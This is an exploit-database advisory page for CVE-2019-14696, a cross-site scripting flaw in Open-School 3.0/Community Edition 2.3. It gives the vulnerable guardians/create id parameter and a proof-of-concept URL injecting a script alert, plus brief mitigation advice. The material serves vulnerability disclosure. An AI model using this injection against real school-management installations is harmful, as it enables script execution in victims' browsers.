header-logo
Suggest Exploit
vendor:
Open-School 3.0/Community Edition 2.3
by:
Greg.Priest
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Open-School 3.0/Community Edition 2.3
Affected Version From: Open-School 3.0
Affected Version To: Community Edition 2.3
Patch Exists: YES
Related CWE: CVE-2019-14696
CPE: a:open-school:open-school_3.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Linux
2019

XSS in Open-School 3.0/Community Edition 2.3

Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter. An attacker can inject malicious JavaScript code into the id parameter, which will be executed when the page is loaded.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize user input and escape output to prevent malicious code from being executed.
Source

Exploit-DB raw data:

# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

Navigation

Suggest Exploit

Services By CQR